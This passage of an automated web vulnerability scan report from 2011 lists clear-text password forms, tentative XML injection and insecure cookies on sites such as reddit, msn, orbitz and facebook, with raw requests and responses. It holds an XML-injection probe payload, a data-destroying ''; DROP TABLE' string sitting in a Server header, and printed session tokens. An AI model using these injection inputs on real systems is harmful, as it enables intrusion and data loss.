The form contains the following password field:

passwd

Request

GET /domain/static.2mdn.net/new/x22 HTTP/1.1
Host: www.reddit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: '; DROP TABLE servertypes; --
Date: Wed, 02 Feb 2011 19:30:39 GMT
Content-Length: 27361
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" ><head><titl
...[SNIP]...
</p><form id="login_login" method="post" action="http://www.reddit.com/domain/static.2mdn.net/post/login" onsubmit="return post_user(this, 'login');" target="_top"><input type="hidden" name="reason" value="" />
...[SNIP]...
</label><input id="passwd_login" name="passwd" type="password" maxlength="20"/><span class="error WRONG_PASSWORD field-passwd" style="display:none">
...[SNIP]...

5.29. http://www.reddit.com/domain/static.2mdn.net/new/x22 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reddit.com
Path:	/domain/static.2mdn.net/new/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.reddit.com/domain/static.2mdn.net/post/reg

The form contains the following password fields:

passwd
passwd2

Request

GET /domain/static.2mdn.net/new/x22 HTTP/1.1
Host: www.reddit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: '; DROP TABLE servertypes; --
Date: Wed, 02 Feb 2011 19:30:39 GMT
Content-Length: 27361
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" ><head><titl
...[SNIP]...
</p><form id="login_reg" method="post" action="http://www.reddit.com/domain/static.2mdn.net/post/reg" onsubmit="return post_user(this, 'register');" target="_top"><input type="hidden" name="reason" value="" />
...[SNIP]...
</label><input id="passwd_reg" name="passwd" type="password" maxlength="20"/><span class="error BAD_PASSWORD field-passwd" style="display:none">
...[SNIP]...
</label><input name="passwd2" id="passwd2_reg" type="password" maxlength="20" /><span class="error BAD_PASSWORD_MATCH field-passwd2" style="display:none">
...[SNIP]...

5.30. http://www.reddit.com/domain/static.2mdn.net/x22 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reddit.com
Path:	/domain/static.2mdn.net/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.reddit.com/domain/static.2mdn.net/post/reg

The form contains the following password fields:

passwd
passwd2

Request

GET /domain/static.2mdn.net/x22 HTTP/1.1
Host: www.reddit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: '; DROP TABLE servertypes; --
Date: Wed, 02 Feb 2011 19:30:39 GMT
Content-Length: 27361
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" ><head><titl
...[SNIP]...
</p><form id="login_reg" method="post" action="http://www.reddit.com/domain/static.2mdn.net/post/reg" onsubmit="return post_user(this, 'register');" target="_top"><input type="hidden" name="reason" value="" />
...[SNIP]...
</label><input id="passwd_reg" name="passwd" type="password" maxlength="20"/><span class="error BAD_PASSWORD field-passwd" style="display:none">
...[SNIP]...
</label><input name="passwd2" id="passwd2_reg" type="password" maxlength="20" /><span class="error BAD_PASSWORD_MATCH field-passwd2" style="display:none">
...[SNIP]...

5.31. http://www.reddit.com/domain/static.2mdn.net/x22 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reddit.com
Path:	/domain/static.2mdn.net/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.reddit.com/domain/static.2mdn.net/post/login

The form contains the following password field:

passwd

Request

GET /domain/static.2mdn.net/x22 HTTP/1.1
Host: www.reddit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.32. http://www.shape.com/workouts/articles/blood_sugar.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/blood_sugar.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.shape.com/kickapps/public/ajax-login

The form contains the following password field:

password

Request

GET /workouts/articles/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 01 Feb 2011 14:33:57 GMT
Server: Apache
Cache-Control: max-age=900
Location: http://www.shape.com/workouts/articles/blood-sugar.html
X-Server-Name: (null)
ETag: "1296570837"
Last-Modified: Tue, 01 Feb 2011 14:33:57 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 01 Feb 2011 14:48:56 GMT
Content-Type: text/html; charset=utf-8
Age: 2
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close
Content-Length: 27153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<div class="upper_login_not_logged" style="display: none;">
<form action="/kickapps/public/ajax-login" method="POST">
<table border="0">
...[SNIP]...
<input type="text" value="Password" name="password-clear" /><input style="display: none;" type="password" name="password" /></div>
...[SNIP]...

5.33. http://www.shape.com/workouts/articles/workout_schedule.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/workout_schedule.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.shape.com/kickapps/public/ajax-login

The form contains the following password field:

password

Request

GET /workouts/articles/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 01 Feb 2011 14:33:57 GMT
Server: Apache
Cache-Control: max-age=900
Location: http://www.shape.com/workouts/articles/workout-schedule.html
X-Server-Name: (null)
ETag: "1296570837"
Last-Modified: Tue, 01 Feb 2011 14:33:57 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 01 Feb 2011 14:48:56 GMT
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 mdw107102 (MII-APC/1.6)
Connection: close
Content-Length: 27158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<div class="upper_login_not_logged" style="display: none;">
<form action="/kickapps/public/ajax-login" method="POST">
<table border="0">
...[SNIP]...
<input type="text" value="Password" name="password-clear" /><input style="display: none;" type="password" name="password" /></div>
...[SNIP]...

5.34. http://www.threatexpert.com/signin.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/signin.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.threatexpert.com/signin.aspx

The form contains the following password field:

Login1$Password

Request

GET /signin.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:05:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
ThreatExp
...[SNIP]...
</table>

<form name="form1" method="post" action="signin.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
...[SNIP]...
<td><input name="Login1$Password" type="password" id="Login1_Password" /><span id="Login1_PasswordRequired" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

5.35. http://www.threatexpert.com/signup.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/signup.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.threatexpert.com/signup.aspx

The form contains the following password fields:

txtPassword
txtPassword2

Request

GET /signup.aspx HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:05:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
ThreatExp
...[SNIP]...
</table>

<form name="form1" method="post" action="signup.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
...[SNIP]...
<td style="padding: 5px 5px 5px 5px">
<input name="txtPassword" type="password" maxlength="50" id="txtPassword" style="width:280px;" />
<span id="RequiredFieldValidator1" style="color:Red;visibility:hidden;">
...[SNIP]...
<td style="padding: 5px 5px 5px 5px">
<input name="txtPassword2" type="password" maxlength="50" id="txtPassword2" style="width:280px;" />
<span id="RequiredFieldValidator3" style="color:Red;visibility:hidden;">
...[SNIP]...

5.36. http://www.untraceableemail.net/boobitrap/eCheck.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.untraceableemail.net
Path:	/boobitrap/eCheck.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.untraceableemail.net/boobitrap/validateUser.php

The form contains the following password field:

password

Request

GET /boobitrap/eCheck.php HTTP/1.1
Host: www.untraceableemail.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:15:20 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: Apache=173.193.214.243.1296663320848847; path=/; expires=Wed, 09-Mar-11 16:15:20 GMT
Content-Length: 1740
Connection: close
Content-Type: text/html; charset=UTF-8

<style type="text/css">
<!--
.boobytraptext {
   font-family: Arial, Helvetica, sans-serif; font-weight:bold;
}
.boobytraptext {
   color: #CCC;

}
body {
   background-color: #000;
   text-align: center;
}

...[SNIP]...
</p>
<form id="form1" name="form1" method="post" action="validateUser.php">
<p>
...[SNIP]...
<label>
<input type="password" name="password" id="password">
</label>
...[SNIP]...

5.37. http://www.worldmastiffforum.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.worldmastiffforum.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.worldmastiffforum.com/register

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.worldmastiffforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6. XML injection previous next
There are 5 instances of this issue:

http://services.money.msn.com/quoteservice/streaming [format parameter]
http://www.plentyoffish.com/member23010679.htm [ASP.NET_SessionId cookie]
http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=left&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 [REST URL parameter 1]
http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=right&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 [REST URL parameter 1]
http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=top&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 [REST URL parameter 1]

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.

6.1. http://services.money.msn.com/quoteservice/streaming [format parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://services.money.msn.com
Path:	/quoteservice/streaming

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /quoteservice/streaming?symbol=$INDU,$COMPX,$INX&format=json]]>>&callback=jsonp1296683387897 HTTP/1.1
Host: services.money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/investing?998d7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 14:19:24 GMT
Content-Length: 2045

<?xml version="1.0" encoding="utf-8"?><root><result><DynamicSymbology><Symbol>$INDU</Symbol><CompanyName>Dow Jones Industrial Average Index</CompanyName><Country>US</Country><Type>Index</Type></Dynami
...[SNIP]...

6.2. http://www.plentyoffish.com/member23010679.htm [ASP.NET_SessionId cookie] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.plentyoffish.com
Path:	/member23010679.htm

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the ASP.NET_SessionId cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /member23010679.htm HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw]]>>;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:34:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=rgz2kvl4hvurh5cb0uty2fmr; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16511

<html><head><title>jr0599914 Dallas Texas singles, Dallas Texas women</title>
<META HTTP-EQUIV="Content-Language" CONTENT="EN">
<meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
<br>Cilantro tastes like soap.<br>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.revresda.com
Path:	/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=left&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js.ng]]>>/site=orbitz&Section=flightstatus&adsize=300x250&pos=left&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://updates.orbitz.com/flight_status
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

HTTP/1.1 404 Not Found
Retry-After: 0
Content-Type: text/html; charset=utf-8
ntCoent-Length: 277
Date: Sat, 05 Feb 2011 14:23:01 GMT
Age: 0
Connection: close
Server: Apache
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/
Content-Length: 277

   <?xml version="1.0" encoding="utf-8"?>
   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html>
   <head>
       <title>404 Not Found</tit
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.revresda.com
Path:	/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=right&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991

Issue detail

Request

GET /js.ng]]>>/site=orbitz&Section=flightstatus&adsize=300x250&pos=right&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://updates.orbitz.com/flight_status
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

HTTP/1.1 404 Not Found
Retry-After: 0
Content-Type: text/html; charset=utf-8
ntCoent-Length: 277
Date: Sat, 05 Feb 2011 14:23:22 GMT
Age: 0
Connection: close
Server: Apache
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/
Content-Length: 277

   <?xml version="1.0" encoding="utf-8"?>
   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html>
   <head>
       <title>404 Not Found</tit
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.revresda.com
Path:	/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=top&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991

Issue detail

Request

GET /js.ng]]>>/site=orbitz&Section=flightstatus&adsize=300x250&pos=top&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://updates.orbitz.com/flight_status
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aebaa22-3554-1360392959-4

Response

HTTP/1.1 404 Not Found
Retry-After: 0
Content-Type: text/html; charset=utf-8
ntCoent-Length: 277
Date: Sat, 05 Feb 2011 14:23:40 GMT
Age: 0
Connection: close
Server: Apache
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/
Content-Length: 277

   <?xml version="1.0" encoding="utf-8"?>
   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html>
   <head>
       <title>404 Not Found</tit
...[SNIP]...

7. SSL cookie without secure flag set previous next
There are 44 instances of this issue:

https://ads.pof.com/
https://careers.microsoft.com/
https://faq.orbitz.com/
https://faq.orbitz.com/app/answers/detail/a_id/15644
https://gc.synxis.com/xbe/rez.aspx
https://twitter.com/
https://twitter.com/about
https://twitter.com/about/contact
https://twitter.com/about/resources
https://twitter.com/account/complete
https://twitter.com/account/resend_password
https://twitter.com/login
https://twitter.com/privacy
https://twitter.com/sessions
https://twitter.com/sessions/change_locale
https://twitter.com/sessions/destroy
https://twitter.com/signup
https://twitter.com/tos
https://www.astaro.co.uk/beacon/(beid
https://www.astaro.com/beacon/(beid)/06oa3arq6oafh8mmgccr289cup83h1
https://www.astaro.com/beacon/(beid)/0mgc3arq6oafh8mmgccr289cup83h1
https://www.astaro.com/user/login
https://www.astaro.de/beacon/(beid
https://www.astaro.net/beacon/(beid
https://www.orbitz.com/account/login
https://www.orbitz.com/account/registration
https://www.orbitz.com/trips/writeReview
https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js
https://login.facebook.com/
https://login.facebook.com/ajax/intl/language_dialog.php
https://login.facebook.com/help/
https://login.facebook.com/login.php
https://login.facebook.com/r.php
https://login.live.com/login.srf
https://maps-api-ssl.google.com/maps
https://omniturebanners.112.2o7.net/b/ss/omniturebanners/1/H.9--NS/0
https://sitesearch.omniture.com/center/
https://www.facebook.com/
https://www.facebook.com/2008/fbml
https://www.facebook.com/login.php
https://www.orbitz.com/Secure/SignIn
https://www.orbitz.com/Secure/ViewSecureCalendar
https://www.orbitz.com/Secure/ViewSetupCareAlertsProfile
https://www.scanalert.com/RatingVerify

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

7.1. https://ads.pof.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://ads.pof.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASP.NET_SessionId=pf1zsia2vewc4vhyyu3ymws5; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ads.pof.com
Connection: keep-alive
Referer: http://www.plentyoffish.com/advertising.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

7.2. https://careers.microsoft.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://careers.microsoft.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=ysf2phmmwmrwurexvwe3yi45; path=/; HttpOnly
ASP.NET_SessionId=tljzinbvi22wraeeaodbwt45; path=/; HttpOnly

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: careers.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://careers.microsoft.com/gclp.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ysf2phmmwmrwurexvwe3yi45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=tljzinbvi22wraeeaodbwt45; path=/; HttpOnly
Set-Cookie: SessionProfile=ysf2phmmwmrwurexvwe3yi45; path=/; secure
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Date: Tue, 01 Feb 2011 15:30:46 GMT
Connection: close
Content-Length: 155

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://careers.microsoft.com/gclp.aspx">here</a>.</h2>
</body></html>

7.3. https://faq.orbitz.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://faq.orbitz.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

cp_session=UykAdAJ2BCBXPwJyVkoGTgI0UkUEEgIuB21baAMjAHoBcwdrByFVbA4tBA4BKQJ3UWYBIAIiUTkBalZqAQgBegtBCmFUGAMlUVsETgA9BVZTAQACAk8ERFdUAmNWbQZ0AmdSdwRsAmsHI1t%2B; path=/
TS2744aa=b86dc7ce556c42b11585c5072c4ea4e4605623f144bde6d64d48259c; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: faq.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:24:12 GMT
P3P: policyref="https://faq.orbitz.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=UykAdAJ2BCBXPwJyVkoGTgI0UkUEEgIuB21baAMjAHoBcwdrByFVbA4tBA4BKQJ3UWYBIAIiUTkBalZqAQgBegtBCmFUGAMlUVsETgA9BVZTAQACAk8ERFdUAmNWbQZ0AmdSdwRsAmsHI1t%2B; path=/
RNT-Time: D=288769 t=1296573852057408
RNT-Machine: 01
F5_do_compression: yes
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS2744aa=b86dc7ce556c42b11585c5072c4ea4e4605623f144bde6d64d48259c; Path=/
Content-Length: 69705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
